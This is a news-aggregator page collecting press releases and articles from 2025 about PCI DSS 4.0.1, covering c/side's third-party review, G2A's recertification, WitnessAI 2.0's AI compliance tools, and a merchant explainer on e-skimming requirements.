Latest news with #PCIDSS4.0.1
Yahoo
28-05-2025
- Business
- Yahoo
c/side Evaluated by VikingCloud Against New PCI DSS 4.0.1 Security Requirements
An independent technical review highlights how c/side's platform can effectively protect and mitigate attacks relevant to PCI DSS requirements 6.4.3 and 11.6.1 SAN FRANCISCO, May 28, 2025 (GLOBE NEWSWIRE) -- c/side, which specializes in securing vulnerable web dependencies, today announced the results of a technical review conducted by global cybersecurity firm, VikingCloud. The assessment evaluated how c/side's platform may help organizations address PCI DSS 4.0.1 requirements 6.4.3 and 11.6.1. Following the March 2025 PCI DSS compliance deadline, merchants and service providers must implement measures to inventory, monitor, and validate all browser-side scripts, especially those running on payment pages. VikingCloud's technical review found that when properly configured, c/side's proxy-based and agentless implementations can help detect and mitigate certain client-side attack scenarios related to PCI DSS requirements for payment page script integrity and monitoring. The full technical review is available here. VikingCloud and c/side will discuss client-side security gaps and PCI DSS compliance during a webinar on June 24; register here. 'VikingCloud's technical review highlights how c/side's capabilities can support organizations in addressing critical browser-based threats and aligning with evolving PCI DSS requirements,' said Mike Kutlu, GTM Operations, c/side. 'These are not theoretical risks. Client-side attacks are happening every day, and companies need a solution that keeps up. c/side offers exactly that, and we believe this review offers helpful third-party insight into how c/side fits into that effort.' Findings from VikingCloud's technical review VikingCloud, a global cybersecurity and PCI compliance firm, conducted a multi-week technical assessment of the c/side platform under a contracted engagement. The review included controlled testing scenarios involving client-side threats, such as keyloggers and script tampering attacks. The evaluation noted that c/side's proxy-based architecture enables real-time inspection and blocking of malicious scripts, while the agentless approach provides periodic crawl-based analysis with shared threat intelligence. Both methods offer compliance-ready monitoring, alerting, and reporting. Built for real-world use cases The c/side platform is engineered for flexibility. Its proxy deployment offers continuous, real-time monitoring without requiring code changes, while the agentless mode supports teams with limited engineering resources or external development partners. Both configurations integrate with popular compliance and security tools like AWS S3, Vanta, Drata, and Sprinto. To simplify compliance reporting, c/side automatically generates weekly script and header change reports aligned to PCI DSS audit requirements. These reports eliminate guesswork for IT teams and streamline auditor communication. To learn more about how c/side supports PCI DSS 4.0.1 compliance, visit: VikingCloud and c/side will discuss client-side security gaps and PCI DSS compliance during a webinar on June 24. To register for the VikingCloud and c/side webinar, visit: Disclaimer:The technical review described in this release was conducted by VikingCloud under a contracted engagement with c/side. The findings reflect a point-in-time assessment of the c/side platform's capabilities in relation to PCI DSS requirements 6.4.3 and 11.6.1. This review does not constitute an endorsement, certification, or formal validation of PCI DSS compliance by VikingCloud. Organizations using the c/side platform remain responsible for conducting their own PCI DSS assessments and working with a Qualified Security Assessor (QSA) or other authorized party to determine compliance. About c/side c/side is a venture-backed cybersecurity company specializing in browser-side threat detection and protection. The company's platform provides complete visibility and control over vulnerable first- and third-party scripts running on websites, protecting sensitive visitor data while ensuring optimal website performance. c/side's innovative technology enables customers to secure their web supply chain against sophisticated attacks and streamlines compliance with regulations such as PCI DSS 4.0.1. ContactKyle Petersonkyle@
Associated Press
08-05-2025
- Business
- Associated Press
G2A.COM achieves PCI DSS 4.0.1 recertification, strengthening its leadership in payment security.
LONDON, UNITED KINGDOM, May 8, 2025 / / -- achieves PCI DSS 4.0.1 recertification, strengthening its leadership in payment security the world's largest marketplace for digital entertainment, has successfully renewed its compliance with the Payment Card Industry Data Security Standard (PCI DSS), achieving certification under the latest version 4.0.1. This recertification reinforces G2A's continued commitment to safeguarding user data and upholding the highest global standards of payment security. The PCI DSS standard, established by the PCI Security Standards Council, is a mandatory compliance framework for any company that stores, processes, or transmits cardholder data. Major global brands such as Amazon, Apple, and Microsoft maintain this certification, and is proud to stand alongside them in prioritizing secure commerce. 'The renewal of our PCI DSS certification – especially under the latest and most stringent version – underscores our long-term dedication to protecting our users' data at every stage of the payment process,' said Dorota Wróbel, General Manager at 'Security isn't a checkbox – it's a mindset that runs through every system, every process, and every person at Upgrading to PCI DSS 4.0.1 is a new standard in vigilance Version 4.0.1 of the PCI DSS introduces a major evolution in how organizations must operate. Unlike earlier iterations, this version transforms compliance from a one-time project into an ongoing security program, requiring organizations to implement continuous monitoring, proactive risk mitigation, and security-by-design development practices. infrastructure and operations were assessed by Patronusec, one of the Qualified Security Assessor (QSA), as part of a comprehensive audit covering nearly 270 rigorous security controls across people, processes, and technologies. G2A's recertification process validates the integrity of its security architecture and the robustness of its payment ecosystem. Achieving this certification is far from a formality — it is reserved for only the most thoroughly prepared companies in the world when it comes to data security. Building trust through security First certified in February 2024, G2A has now maintained its PCI DSS compliance for a second consecutive year. The renewal, awarded on February, confirms that the company continues to meet – and exceed – the industry's most demanding cybersecurity requirements. The first year is the most challenging, as it introduces a range of new and complex security processes that must be implemented and strictly followed. Compliance is not declarative – it must be proven with solid evidence during re-certification audits. 'For our millions of global users, trust is everything,' said Dorota Wróbel, 'This certification is one of many ways we prove that we take that trust seriously – not just once a year, but every single day.' To learn more about G2A's, visit: G2A's Corporate website. – ENDS – About is the world's largest and most trusted marketplace for digital entertainment, where more than 35 million people from 180 countries have purchased over 135 million items. Users can choose from more than 90,000 digital offerings incl. games, DLCs, in-game items, as well as non-gaming items such as gift cards, subscriptions, software, or e-learning - sold by sellers from all over the world. leads in online security, awarded with the prestigious American CNP award for the Best Merchant Team of the Year in Anti-fraud and Cybersecurity, alongside companies such as Microsoft, Barclay's Bank, and First Data. Julia Horvath Ranieri email us here Legal Disclaimer: EIN Presswire provides this news content 'as is' without warranty of any kind. We do not accept any responsibility or liability for the accuracy, content, images, videos, licenses, completeness, legality, or reliability of the information contained in this article. If you have any complaints or copyright issues related to this article, kindly contact the author above.
Techday NZ
05-05-2025
- Business
- Techday NZ
WitnessAI 2.0 boosts PCI DSS compliance & AI risk controls
WitnessAI has announced the release of WitnessAI 2.0, offering new tools to help enterprises meet PCI DSS 4.0.1 compliance requirements while integrating AI technologies. The updated platform introduces five significant features: PCI-specific AI controls with measures to prevent payment data loss, agentless and proxy-less policy enforcement for remote employees, risk analytics for AI usage, detection of insider threats across AI platforms, and a privacy mode tailored for applications such as Microsoft Copilot. The release of WitnessAI 2.0 comes as organisations face increased obligations under revised PCI DSS standards to address risks presented by artificial intelligence tools. The PCI Security Standards Council recently issued new guidelines outlining how AI should factor into PCI assessments, highlighting the need to control and monitor all technologies with access to cardholder data environments. The company's new update features PCI DSS-specific controls and reporting, which align AI activity with the 4.0.1 standard and incorporate focused protections against payment card data loss. Additionally, the platform's remote employee controls support compliance for staff working in hybrid, remote, or travelling situations without requiring software installation or changes to network architecture. Behavioural and runtime analytics form part of the regulatory risk analytics tools, offering organisations detailed insights to identify and remedy potential compliance gaps as they expand their use of AI. Insider threat detection capabilities use analysis of user interactions over time and across AI systems to flag compromised or malicious accounts that could lead to breaches. Privacy controls have also been enhanced, with an executive privacy mode designed to protect confidential internal discussions on AI platforms, specifically catering to tools like Microsoft Copilot. Rick Caccia, Chief Executive Officer and Co-founder of WitnessAI, commented on the regulatory compliance landscape with artificial intelligence: "Too often, AI regulatory compliance focuses on future-facing regulations such as the EU AI Act. But employee AI usage brings significant risk to the regulations, such as PCI DSS, that companies face today. With WitnessAI 2.0, any organisation subject to PCI DSS can ensure complete compliance and easy reporting of control effectiveness." David Neuman, Senior Analyst at TAG Infosphere, highlighted organisations' shifting work environment and compliance issues. He said, "The ability to enforce AI use policies regardless of where employees work is critical for PCI compliance. The new guidelines around AI use in PCI assessments will become an increasingly significant concern for organisations, even as they continue to adapt to PCI DSS 4.0.1 requirements." Jonathan Kennedy, Chief Information Security Officer at InComm Payments, shared his organisation's experience using WitnessAI. "We're focused on ensuring intellectual property and sensitive information isn't accidentally leaked. WitnessAI helps us achieve security and compliance with our diverse portfolio, reducing risk while maximising productivity." WitnessAI's platform is designed to help regulated industries manage compliance and security as they introduce AI into their workflows. Its recognition as a finalist in the Best Compliance Solution category at the 2025 SC Awards underscores its position in supporting organisations navigating established and emerging artificial intelligence regulations.
Business Wire
30-04-2025
- Business
- Business Wire
WitnessAI 2.0 Delivers New Regulatory Compliance Capabilities to Support Safe AI Adoption
MOUNTAIN VIEW, Calif.--(BUSINESS WIRE)-- WitnessAI, creator of the first enablement platform for safe AI use, and a finalist for the SC Awards for Best Compliance Solution, today announced the release of WitnessAI 2.0, offering five key updates for organizations looking to remain compliant with regulations such as the Payment Card Industry Data Security Standard (PCI DSS) while adopting enterprise AI tools. PCI DSS-Specific Controls and Reports: AI activity controls mapped directly to PCI DSS 4.0.1, including payment card data loss prevention. Remote Employee Controls: The industry's first and only zero-install, agentless and proxy-less capability for AI observability and policy control. This feature ensures compliance in remote, traveling, or hybrid environments. Regulatory Risk Analytics: Behavioral and runtime analytics can provide insight into best practices, potential risks, and areas for improvement as organizations develop their AI strategies and put them into practice. AI Insider Threat Detection: By analyzing conversations over time and across AI applications, WitnessAI can detect compromised or malicious user accounts likely to cause data breach or theft. Executive Privacy Mode: Applications like Microsoft Copilot can share data in unexpected and insecure ways. Executives can now leverage Copilot and other AI tools with enhanced privacy controls, keeping internal AI conversations private. 'Too often, AI regulatory compliance focuses on future-facing regulations such as the EU AI Act," said Rick Caccia, CEO and Co-founder at WitnessAI. 'But employee AI usage brings significant risk to the regulations, such as PCI DSS, that companies face today. With WitnessAI 2.0, any organization subject to PCI DSS can ensure complete compliance and easy reporting of control effectiveness.' The PCI Security Standards Council recently released guidelines for ' Integrating Artificial Intelligence in PCI Assessments,' demonstrating growing recognition of AI's role in payment security ecosystems. Under PCI DSS 4.0.1, organizations must carefully scope and secure all systems that 'could impact the security of the CDE' (Cardholder Data Environment) - a criterion that implicitly includes AI tools with access to sensitive environments. WitnessAI provides the visibility, control, and protection needed to ensure that these AI interactions comply with PCI requirements, helping organizations maintain regulatory compliance while safely leveraging AI capabilities. "The ability to enforce AI use policies regardless of where employees work is critical for PCI compliance," stated David Neuman, Senior Analyst, TAG Infosphere. "The new guidelines around AI use in PCI assessments will become an increasingly significant concern for organizations, even as they continue to adapt to PCI DSS 4.0.1 requirements. Organizations face real challenges in ensuring compliance when employees work away from the corporate network, like during travel or just working from home. Maintaining flexibility while having complete confidence in compliance posture isn't just desirable, it's a business necessity." As more organizations grapple with the complexities of maintaining compliance and preventing data loss, innovative solutions become paramount. This is precisely why FinTech provider InComm Payments turned to WitnessAI. "We're focused on ensuring intellectual property and sensitive information isn't accidentally leaked,' said Jonathan Kennedy, CISO at InComm Payments. 'We knew we needed a way to maintain security and compliance while encouraging our teams to leverage modern approaches with GenAI applications. We chose WitnessAI because they help us achieve just that with our diverse portfolio. Our compliance, data-loss prevention, and privacy teams now have total visibility and confidence in our AI security. We're reducing risk while maximizing our productivity because of WitnessAI.' WitnessAI is designed to address unique and ongoing compliance challenges of AI in regulated environments, offering a platform that will evolve with AI regulations as they emerge. The WitnessAI Secure AI Enablement Platform was recognized as a 2025 SC Awards finalist in the 'Best Compliance Solution' category, showing a proven dedication to helping businesses navigate the intersection between AI innovation and compliance. View the full list of 2025 SC Awards finalists here: WitnessAI is in use by global organizations today, detecting shadow AI, providing full visibility into user activity, and protecting users and data from loss and harm. Security and privacy leaders interested in a demonstration of the WitnessAI platform can contact the company at demo@ WitnessAI enables safe and effective adoption of enterprise AI, through security and governance guardrails for public and private LLMs. The WitnessAI Secure AI Enablement Platform provides visibility of employee AI use, control of that use via AI-oriented policy, and protection of that use via data and topic security. Learn more at
Zawya
06-03-2025
- Business
- Zawya
How new PCI Standards will change online security for retailers?
In order to comply with future-dated PCI-DSS compliance requirements, merchants must implement a series of new security measures. The new requirements come into effect now, March 2025, and will help to protect consumers and retailers against online fraud. As e-commerce has grown, so too has the number of bad actors looking to exploit security weaknesses to steal credit card data, also known as e-skimming. Future-dated requirements that come into effect in March 2025 will help to protect consumers and retailers alike, but online merchants must implement a series of new security measures to ensure compliance. Each year, thousands of card details are stolen in online card transactions - even on well-known and big-brand websites. Hackers are becoming increasingly sneaky, so even if a merchant's card capture form is secure, they can exploit security weaknesses elsewhere on a website and intercept sensitive data before it even reaches the merchant's secure payment form. That's why the new PCI DSS 4.0.1 safety standards require retailers to secure their entire website. Reputable payment platforms meet the highest standards of payment security, which reduces the scope of compliance efforts for retailers. However, there are still a few steps merchants need to take to ensure that their site is fully compliant. PCI what? Payment Card Industry Data Standards (PCI DSS) refers to a set of standards that retailers must comply with - no matter their size. The standards are updated from time to time, and the latest version, PCI DSS 4.0.1, has some future-dated requirements that come into effect at the end of March 2025. PCI DSS 4.0.1 enforces stricter security measures for the entire site to prevent attacks like e-skimming and to ensure secure payment processing. It is designed to enhance the security of cardholder data by adopting a comprehensive approach to security measures and access controls. This means that merchants are responsible for securing every part of the payment flow, ensuring that both the payment form and the hosting web environment are protected. PCI DSS 4.0.1 has stronger password and multi-factor authentication requirements. It also has improved security practices, with updates for e-commerce security and third party risk management. It is more flexible, with more customised approaches to compliance, and comes with improved guidance and examples. What does this mean for retailers? The new requirements oblige merchants to take a more active role in securing payment pages, and proactively monitoring for signs of compromise. In particular, there are two requirements which merchants need to act on before the end of March 2025. Firstly, merchants have to keep track of all their (software) scripts, even those from third parties. All scripts have to be authorised and merchants need to ensure that they haven't been tampered with. Testing for unauthorised scripts is mandatory. This is essential because attackers can compromise third-party scripts to steal card data directly from customers' browsers. Secondly, merchants need to monitor payment pages for unexpected changes to things like code or even the way the page is displayed in the browser. Merchants need to set up alerts to notify them of suspicious activity to detect and respond to attacks more quickly. This is important because attackers are able to modify web pages to redirect customers to fake sites, or to steal their data. PCI requirements become more rigorous depending on a merchant's transaction volumes, with levels broken down as follows: - Level 1: Over 6 million transactions per year - Level 2: 1-6 million transactions per year - Level 3: 20,000-1 million transactions per year - Level 4: Fewer than 20,000 transactions per year Next steps for retailers Think of your website security the same way you would your home security. Each time you leave your house, you lock the doors and close the windows, and probably set an alarm system. Ensuring your website is PCI DSS 4.0.1 compliant essentially locks the doors and windows on your website, and guards against e-skimming. It's imperative that you comply to protect your customers and your business. Some helpful next steps: - Determine your compliance level: Your PCI DSS scope (the extent to which you need to comply with the standard) is determined by how you handle cardholder data. - Understand the requirements by reviewing the PCI DSS v 4.0.1 (Available for download through the PCI Security Standards Council.) - Assess your current security level by identifying gaps and areas for improvement - Implement necessary security controls based on your chosen integration method. - Document your compliance efforts, which requires you to maintain records of policies, procedures, and assessments. - Regularly monitor and maintain compliance For some retailers, this may all seem quite foreign. The first step is to speak to your webmaster about what needs to be done. All rights reserved. © 2022. Provided by SyndiGate Media Inc. (
